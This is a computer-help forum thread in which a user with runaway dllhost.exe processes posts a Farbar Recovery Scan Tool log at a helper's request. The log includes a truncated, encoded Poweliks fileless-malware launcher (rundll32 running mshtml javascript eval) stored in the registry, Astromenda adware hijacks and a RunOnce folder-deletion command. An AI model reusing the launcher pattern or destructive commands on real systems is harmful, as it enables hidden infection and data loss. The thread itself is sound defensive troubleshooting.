
Multiple dllhost.exe 32 processes are created


6 replies to this topic

#1 rods

rods

  • Members
  • 32 posts
  • OFFLINE
  •  
  • Local time:01:41 AM

Posted 17 October 2014 - 03:41 PM

Hello, I'm having multiple (about 40) dllhost.exe 32 processes being created and using 100% of my CPU.

What I've tried doing so far:

Ran Malwarebytes antimalware in normal and safe mode - Nothing detected
I've disconnected computer from the internet and stopped all dllhost.exe 32 processes.
I went to Windows Firewall and tried to block dllhost.exe from outbound connections, but it started again.

What should I try next? Thanks in advance!



#2 Rootk

Rootk

  • Malware Response Team
  • 234 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Easter Island, Chile.
  • Local time:05:41 AM

Posted 17 October 2014 - 03:58 PM

Hi. I'm Rootk and I will be helping you with your problem.

 

Please do the following:

 

Download Farbar Recovery Scan Tool and save it to your desktop. Please pick the version that matches your operating system's bit type. If you don't know which version matches your system, take a look at this link: http://www.bleepingcomputer.com/tutorials/32-bit-or-64-bit-windows/

Double-click to run it. When the tool opens, click Yes to the disclaimer.
Press the Scan button.
It will make a log (FRST.txt) in the same directory the tool is run from. Please copy and paste it to your reply.
The first time the tool is run, it also makes another log (Addition.txt). Please attach it to your reply.



#3 rods

rods
  • Topic Starter

  • Members
  • 32 posts
  • OFFLINE
  •  
  • Local time:01:41 AM

Posted 17 October 2014 - 05:23 PM

Here's the data from FRST.txt

 

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 16-10-2014
Ran by Rod (administrator) on RODWIN7 on 17-10-2014 15:14:42
Running from E:\Documents
Loaded Profiles: Rod & UpdatusUser (Available profiles: Rod & UpdatusUser & Parna)
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Acronis) C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedul2.exe
(Acronis) C:\Program Files (x86)\Common Files\Acronis\CDP\afcdpsrv.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Cisco WebEx LLC) C:\Windows\SysWOW64\atashost.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
() C:\Program Files\D-Link\SharePort Plus\Spnuhelper.exe
(Protexis Inc.) C:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe
(Acronis) C:\Program Files (x86)\Common Files\Acronis\SyncAgent\syncagentsrv.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\tv_w32.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\tv_x64.exe
(Acronis) C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedhlp.exe
(Google) C:\Program Files (x86)\Google\Drive\googledrivesync.exe
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(Plex, Inc.) C:\Program Files (x86)\Plex\Plex Media Server\Plex Media Server.exe
(PFU LIMITED) C:\Program Files (x86)\PFU\ScanSnap\Driver\PfuSsMon.exe
(TechSmith Corporation) C:\Program Files (x86)\TechSmith\Snagit 9\Snagit32.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEM.EXE
(D-Link Corp.) C:\Program Files\D-Link\SharePort Plus\SharePortPlus.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\acrotray.exe
(PFU LIMITED) C:\Program Files (x86)\PFU\ScanSnap\SSFolder\SSFolderTray.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(PFU LIMITED) C:\Windows\SSDriver\fi5110\SsWiaChecker.exe
(PowerISO Computing, Inc.) C:\Program Files (x86)\PowerISO\PWRISOVM.EXE
(Samsung Electronics Co., Ltd.) C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe
(Acronis) C:\Program Files (x86)\Acronis\TrueImageHome\TrueImageMonitor.exe
(Acronis) C:\Program Files (x86)\Common Files\Acronis\TibMounter\TibMounterMonitor.exe
(Renesas Electronics Corporation) C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\rusb3mon.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(TechSmith Corporation) C:\Program Files (x86)\TechSmith\Snagit 9\TscHelp.exe
(Google) C:\Program Files (x86)\Google\Drive\googledrivesync.exe
(TechSmith Corporation) C:\Program Files (x86)\TechSmith\Snagit 9\SnagPriv.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(TechSmith Corporation) C:\Program Files (x86)\TechSmith\Snagit 9\SnagitEditor.exe
(Microsoft Corporation) C:\Windows\splwow64.exe
(Python Software Foundation) C:\Program Files (x86)\Plex\Plex Media Server\PlexScriptHost.exe
(Plex, Inc.) C:\Program Files (x86)\Plex\Plex Media Server\PlexDlnaServer.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\MSACCESS.EXE
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\prevhost.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Acronis Scheduler2 Service] => C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedhlp.exe [403328 2012-08-23] (Acronis)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Adobe Acrobat Speed Launcher] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe [41336 2014-05-08] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe [840568 2014-05-08] (Adobe Systems Inc.)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-01-20] (Apple Inc.)
HKLM-x32\...\Run: [QuickFinder Scheduler] => c:\Program Files (x86)\Corel\WordPerfect Office X6\Programs\QFSCHD160.EXE [169416 2012-07-30] (Corel Corporation)
HKLM-x32\...\Run: [ScanSnap WIA Service Checker] => C:\Windows\SSDriver\fi5110\SsWiaChecker.exe [86016 2009-09-30] (PFU LIMITED)
HKLM-x32\...\Run: [PWRISOVM.EXE] => C:\Program Files (x86)\PowerISO\PWRISOVM.EXE [180224 2010-04-12] (PowerISO Computing, Inc.)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)
HKLM-x32\...\Run: [KiesTrayAgent] => C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe [311616 2014-02-14] (Samsung Electronics Co., Ltd.)
HKLM-x32\...\Run: [TrueImageMonitor.exe] => C:\Program Files (x86)\Acronis\TrueImageHome\TrueImageMonitor.exe [6010264 2012-08-23] (Acronis)
HKLM-x32\...\Run: [AcronisTibMounterMonitor] => C:\Program Files (x86)\Common Files\Acronis\TibMounter\TibMounterMonitor.exe [941440 2012-07-24] (Acronis)
HKLM-x32\...\Run: [RUSB3MON] => C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\rusb3mon.exe [115048 2011-09-20] (Renesas Electronics Corporation)
HKLM-x32\...\RunOnce: [DelTr2236071] => cmd.exe /c rd /s /q  "C:\Users\Rod\AppData\Roaming\WSE_Astromenda"
HKU\S-1-5-21-153314184-682568810-1827683989-1001\...\Run: [GoogleDriveSync] => C:\Program Files (x86)\Google\Drive\googledrivesync.exe [22734160 2014-08-08] (Google)
HKU\S-1-5-21-153314184-682568810-1827683989-1001\...\Run: [KiesAirMessage] => C:\Program Files (x86)\Samsung\Kies\KiesAirMessage.exe -startup
HKU\S-1-5-21-153314184-682568810-1827683989-1001\...\Run: [GoogleChromeAutoLaunch_5D23115B3472A07EC056C924025ED1D4] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [854344 2014-10-09] (Google Inc.)
HKU\S-1-5-21-153314184-682568810-1827683989-1001\...\Run: [uTorrent] => C:\Users\Rod\AppData\Roaming\uTorrent\uTorrent.exe [1385808 2014-10-12] (BitTorrent Inc.)
HKU\S-1-5-21-153314184-682568810-1827683989-1001\...\Run: [Plex Media Server] => C:\Program Files (x86)\Plex\Plex Media Server\Plex Media Server.exe [4525192 2014-08-01] (Plex, Inc.)
HKU\S-1-5-21-153314184-682568810-1827683989-1001\...\RunOnce: [WSE_Astromenda] => [X]
HKU\S-1-5-21-153314184-682568810-1827683989-1001\...\RunOnce: [DelTr2236071] => cmd.exe /c rd /s /q  "C:\Users\Rod\AppData\Roaming\WSE_Astromenda"
HKU\S-1-5-21-153314184-682568810-1827683989-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Install LastPass IE RunOnce.lnk
ShortcutTarget: Install LastPass IE RunOnce.lnk -> C:\Program Files (x86)\Common Files\lpuninstall.exe (LastPass)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ScanSnap Manager.lnk
ShortcutTarget: ScanSnap Manager.lnk -> C:\Program Files (x86)\PFU\ScanSnap\Driver\PfuSsMon.exe (PFU LIMITED)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Snagit 9.lnk
ShortcutTarget: Snagit 9.lnk -> C:\Program Files (x86)\TechSmith\Snagit 9\Snagit32.exe (TechSmith Corporation)
Startup: C:\Users\Rod\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2010 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2010 Screen Clipper and Launcher.lnk -> C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEM.EXE (Microsoft Corporation)
Startup: C:\Users\Rod\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SharePort Plus.lnk
ShortcutTarget: SharePort Plus.lnk -> C:\Program Files\D-Link\SharePort Plus\SharePortPlus.exe (D-Link Corp.)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  No File
ShellIconOverlayIdentifiers: [AcronisSyncError] -> {934BC6C0-FEC2-4df5-A100-961DE2C8A0ED} => C:\Program Files (x86)\Acronis\TrueImageHome\tishell64.dll (Acronis)
ShellIconOverlayIdentifiers: [AcronisSyncInProgress] -> {00F848DC-B1D4-4892-9C25-CAADC86A215D} => C:\Program Files (x86)\Acronis\TrueImageHome\tishell64.dll (Acronis)
ShellIconOverlayIdentifiers: [AcronisSyncOk] -> {71573297-552E-46fc-BE3D-3DFAF88D47B7} => C:\Program Files (x86)\Acronis\TrueImageHome\tishell64.dll (Acronis)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.google.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x3CC8C2417B23CF01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
SearchScopes: HKLM - DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://astromenda.com/results.php?f=4&q={searchTerms}&a=ast_ggfx_14_42_ie&cd=2XzuyEtN2Y1L1QzutDtDtBtBtCyD0F0DyD0FyB0CyBtAtB0BtN0D0Tzu0StCtDtBtCtN1L2XzutAtFtBtFtCtFyDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyBzyyE0CyEtC0FzytGtBtD0AyEtG0A0C0C0EtGyCzzyCyDtGtDzz0BtDyD0F0AyB0ByEtDzz2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyEtCyB0EtByE0D0AtG0C0FyC0CtGyE0F0A0CtG0AtB0FtAtGyD0DtDyDyD0E0C0BtDtB0FtC2Q&cr=422683267&ir=
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://astromenda.com/results.php?f=4&q={searchTerms}&a=ast_ggfx_14_42_ie&cd=2XzuyEtN2Y1L1QzutDtDtBtBtCyD0F0DyD0FyB0CyBtAtB0BtN0D0Tzu0StCtDtBtCtN1L2XzutAtFtBtFtCtFyDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyBzyyE0CyEtC0FzytGtBtD0AyEtG0A0C0C0EtGyCzzyCyDtGtDzz0BtDyD0F0AyB0ByEtDzz2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyEtCyB0EtByE0D0AtG0C0FyC0CtGyE0F0A0CtG0AtB0FtAtGyD0DtDyDyD0E0C0BtDtB0FtC2Q&cr=422683267&ir=
SearchScopes: HKCU - DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://astromenda.com/results.php?f=4&q={searchTerms}&a=ast_ggfx_14_42_ie&cd=2XzuyEtN2Y1L1QzutDtDtBtBtCyD0F0DyD0FyB0CyBtAtB0BtN0D0Tzu0StCtDtBtCtN1L2XzutAtFtBtFtCtFyDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyBzyyE0CyEtC0FzytGtBtD0AyEtG0A0C0C0EtGyCzzyCyDtGtDzz0BtDyD0F0AyB0ByEtDzz2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyEtCyB0EtByE0D0AtG0C0FyC0CtGyE0F0A0CtG0AtB0FtAtGyD0DtDyDyD0E0C0BtDtB0FtC2Q&cr=422683267&ir=
SearchScopes: HKCU - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://astromenda.com/results.php?f=4&q={searchTerms}&a=ast_ggfx_14_42_ie&cd=2XzuyEtN2Y1L1QzutDtDtBtBtCyD0F0DyD0FyB0CyBtAtB0BtN0D0Tzu0StCtDtBtCtN1L2XzutAtFtBtFtCtFyDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyBzyyE0CyEtC0FzytGtBtD0AyEtG0A0C0C0EtGyCzzyCyDtGtDzz0BtDyD0F0AyB0ByEtDzz2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyEtCyB0EtByE0D0AtG0C0FyC0CtGyE0F0A0CtG0AtB0FtAtGyD0DtDyDyD0E0C0BtDtB0FtC2Q&cr=422683267&ir=
BHO: SnagIt Toolbar Loader -> {00C6482D-C502-44C8-8409-FCE54AD9C208} -> C:\Program Files (x86)\TechSmith\Snagit 9\DLLx64\SnagitBHO64.dll (TechSmith Corporation)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: LastPass Vault -> {95D9ECF5-2A4D-4550-BE49-70D42F71296E} -> C:\Program Files (x86)\LastPass\LPToolbar_x64.dll (LastPass)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: SnagIt Toolbar Loader -> {00C6482D-C502-44C8-8409-FCE54AD9C208} -> C:\Program Files (x86)\TechSmith\Snagit 9\SnagitBHO.dll (TechSmith Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: LastPass Vault -> {95D9ECF5-2A4D-4550-BE49-70D42F71296E} -> C:\Program Files (x86)\LastPass\LPToolbar.dll (LastPass)
BHO-x32: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM - No Name - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} -  No File
Toolbar: HKLM - LastPass Toolbar - {9f6b5cc3-5c7b-4b5c-97af-19dec1e380e5} - C:\Program Files (x86)\LastPass\LPToolbar_x64.dll (LastPass)
Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Snagit - {8FF5E183-ABDE-46EB-B09E-D2AAB95CABE3} - C:\Program Files (x86)\TechSmith\Snagit 9\SnagitIEAddin.dll (TechSmith Corporation)
Toolbar: HKLM-x32 - LastPass Toolbar - {9f6b5cc3-5c7b-4b5c-97af-19dec1e380e5} - C:\Program Files (x86)\LastPass\LPToolbar.dll (LastPass)
DPF: HKLM-x32 {E06E2E99-0AA1-11D4-ABA6-0060082AA75C} https://dell.webex.com/client/WBXclient-T29L10NSP4EP2-2/support/ieatgpc1.cab
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1

FireFox:
========
FF Plugin: @lastpass.com/NPLastPass -> C:\Program Files (x86)\LastPass\nplastpass64.dll (LastPass)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @lastpass.com/NPLastPass -> C:\Program Files (x86)\LastPass\nplastpass.dll (LastPass)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @vmware.com/vmrc,version=2.5.0.00000 -> C:\Program Files (x86)\Common Files\VMware\VMware VMRC Plug-in\Firefox\np-vmware-vmrc.dll (VMware, Inc.)
FF Plugin-x32: @vmware.com/vmrc,version=5.5.0.00000 -> C:\Program Files (x86)\Common Files\VMware\VMware Remote Console Plug-in 5.5\Firefox\np-vmware-vmrc.dll (VMware, Inc.)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Air\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Users\Rod\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF Plugin ProgramFiles/Appdata: C:\Users\Rod\AppData\Roaming\mozilla\plugins\npatgpc.dll (Cisco WebEx LLC)
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn
FF Extension: Adobe Acrobat - Create PDF - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn [2014-02-06]

Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.com
CHR StartupUrls: Default -> "hxxp://www.google.com/", "hxxp://www.yahoo.com/", "hxxp://astromenda.com/?f=7&a=ast_ggfx_14_42_ie&cd=2XzuyEtN2Y1L1QzutDtDtBtBtCyD0F0DyD0FyB0CyBtAtB0BtN0D0Tzu0StCtDtBtCtN1L2XzutAtFtBtFtCtFyDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyBzyyE0CyEtC0FzytGtBtD0AyEtG0A0C0C0EtGyCzzyCyDtGtDzz0BtDyD0F0AyB0ByEtDzz2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyEtCyB0EtByE0D0AtG0C0FyC0CtGyE0F0A0CtG0AtB0FtAtGyD0DtDyDyD0E0C0BtDtB0FtC2Q&cr=422683267&ir="
CHR DefaultSuggestURL: Default -> {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&gs_ri={google:suggestRid}&xssi=t&q={searchTerms}&{google:inputType}{google:cursorPosition}{google:currentPageUrl}{google:pageClassification}{google:searchVersion}{google:sessionToken}{google:prefetchQuery}sugkey={google:suggestAPIKeyParameter}
CHR Profile: C:\Users\Rod\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\Rod\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-02-11]
CHR Extension: (Google Drive) - C:\Users\Rod\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-02-11]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Rod\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-22]
CHR Extension: (YouTube) - C:\Users\Rod\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-02-11]
CHR Extension: (Google Search) - C:\Users\Rod\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-02-11]
CHR Extension: (avast! Online Security) - C:\Users\Rod\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2014-09-02]
CHR Extension: (LastPass: Free Password Manager) - C:\Users\Rod\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd [2014-09-09]
CHR Extension: (Google Wallet) - C:\Users\Rod\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-02-11]
CHR Extension: (Gmail) - C:\Users\Rod\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-02-11]
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswwebrepchrome-sp.crx []

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 D-Link SharePort Plus Helper; C:\Program Files\D-Link\SharePort Plus\Spnuhelper.exe [49152 2014-09-11] () [File not signed]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R3 MTsensor; C:\Windows\System32\DRIVERS\ASACPI.sys [8192 2005-03-29] ()
R3 rusb3hub; C:\Windows\System32\DRIVERS\rusb3hub.sys [114568 2012-08-27] (Renesas Electronics Corporation)
R3 rusb3xhc; C:\Windows\System32\DRIVERS\rusb3xhc.sys [230280 2012-08-27] (Renesas Electronics Corporation)
R2 sxuptp; C:\Windows\System32\DRIVERS\sxuptp.sys [310472 2014-09-11] (silex technology, Inc.)
R0 tib_mounter; C:\Windows\System32\DRIVERS\tib_mounter.sys [1093256 2014-04-29] (Acronis)
R0 vidsflt; C:\Windows\System32\DRIVERS\vidsflt.sys [166024 2014-04-29] (Acronis)

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2017-09-20 16:31 - 2017-09-20 16:31 - 00000000 ____D () C:\ProgramData\Malwarebytes
2017-09-20 16:31 - 2014-10-17 11:07 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2017-09-20 16:31 - 2014-10-17 11:07 - 00001102 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2017-09-20 16:31 - 2014-10-17 11:07 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2017-09-20 16:31 - 2014-10-17 11:07 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2017-09-20 16:31 - 2014-05-12 07:26 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2017-09-20 16:31 - 2014-05-12 07:26 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2017-09-20 16:31 - 2014-05-12 07:25 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2017-09-20 16:30 - 2017-09-20 16:31 - 17305616 _____ (Malwarebytes Corporation ) C:\Users\Rod\Downloads\mbam-setup-2.0.1.1004.exe
2014-10-17 15:14 - 2014-10-17 15:14 - 00000000 ____D () C:\FRST
2014-10-17 12:33 - 2014-10-17 12:33 - 04965896 _____ (Piriform Ltd) C:\Users\Rod\Downloads\ccsetup418.exe
2014-10-17 12:33 - 2014-10-17 12:33 - 00720336 _____ ( ) C:\Users\Rod\Downloads\FreeYouTubeDownloaderIC (1).exe
2014-10-17 12:32 - 2014-10-17 12:32 - 00720336 _____ ( ) C:\Users\Rod\Downloads\FreeYouTubeDownloaderIC.exe
2014-10-17 12:28 - 2014-10-17 12:28 - 00000000 ____D () C:\Users\Rod\AppData\Roaming\WSE_Astromenda
2014-10-17 12:28 - 2014-10-17 12:28 - 00000000 ____D () C:\Users\Rod\AppData\Roaming\1H1Q1V1N1N1O2V
2014-10-17 12:27 - 2014-10-17 12:27 - 24656704 _____ (Mozilla) C:\Users\Rod\Downloads\Firefox.EXE
2014-10-17 12:27 - 2014-10-17 12:27 - 00831592 _____ ( ) C:\Users\Rod\Downloads\Unconfirmed 215090.crdownload
2014-10-17 12:27 - 2014-10-17 12:27 - 00831592 _____ ( ) C:\Users\Rod\Downloads\FirefoxSetup (3).exe
2014-10-17 12:27 - 2014-10-17 12:27 - 00831592 _____ ( ) C:\Users\Rod\Downloads\FirefoxSetup (1).exe
2014-10-17 12:26 - 2014-10-17 12:26 - 00831592 _____ ( ) C:\Users\Rod\Downloads\FirefoxSetup.exe
2014-10-17 11:34 - 2014-10-17 11:35 - 127289600 _____ (Microsoft Corporation) C:\Users\Rod\Downloads\msert.exe
2014-10-17 11:04 - 2014-10-17 11:04 - 00000000 ____D () C:\Windows\pss
2014-10-14 22:16 - 2014-10-06 19:54 - 00378552 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-14 22:16 - 2014-10-06 19:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-10-14 22:16 - 2014-09-28 17:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-14 22:16 - 2014-09-25 15:50 - 13619200 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
